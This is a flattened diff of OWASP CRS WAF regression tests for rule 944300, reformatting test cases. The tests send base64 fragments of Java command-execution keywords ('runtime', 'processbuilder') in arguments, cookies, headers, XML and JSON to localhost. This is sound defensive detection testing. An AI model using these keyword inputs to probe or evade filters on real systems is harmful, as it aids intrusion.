log_contains: "id \"944300\"" - - test_title: 944300-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 17 desc: "XML attribute value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 18 desc: "XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_id: 19 desc: "Nested XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_id: 20 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_id: 21 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HJ1bnRpbWU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log_contains: "id \"944300\"" + - test_id: 22 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HJ1bnRpbWU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 23 desc: "Argument test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_id: 24 desc: "Argument name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log_contains: "id \"944300\"" + - test_id: 25 desc: "Cookie test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 26 desc: "Cookie name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BydW50aW1l=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 27 desc: "Request header test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 28 desc: "XML attribute value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 29 desc: "XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_id: 30 desc: "Nested XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_id: 31 desc: "Content-Type text/plain includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_id: 32 desc: "Content-Type application/json arg value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BydW50aW1l\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log_contains: "id \"944300\"" + - test_id: 33 desc: "Content-Type application/json arg name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BydW50aW1l\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 34 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_id: 35 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log_contains: "id \"944300\"" + - test_id: 36 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 37 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvY2Vzc2J1aWxkZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 38 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 39 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 40 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_id: 41 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_id: 42 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_id: 43 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log_contains: "id \"944300\"" + - test_id: 44 desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - 